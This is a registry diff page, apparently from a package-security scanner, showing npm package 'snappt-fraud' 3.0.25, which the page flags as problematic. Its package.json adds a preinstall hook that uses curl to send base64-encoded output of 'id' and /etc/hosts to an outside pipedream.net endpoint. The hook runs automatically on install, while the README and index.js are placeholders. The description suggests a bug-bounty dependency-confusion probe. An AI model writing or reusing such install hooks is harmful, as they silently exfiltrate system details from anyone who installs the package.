snappt-fraud 3.0.25

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of snappt-fraud might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +1 -0
  3. package/package.json +13 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ `hello :D`
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log(123)
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "snappt-fraud",
3
+ "version": "3.0.25",
4
+ "description": "hackerone-tosun",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl -d $(id | base64) -d $(cat /etc/hosts | base64 ) https://db45d972f8dcc1c11b2885c8c7ae5e52.m.pipedream.net/"
9
+ },
10
+ "author": "tosun@hackerone",
11
+ "license": "ISC",
12
+ "dependencies": {}
13
+ }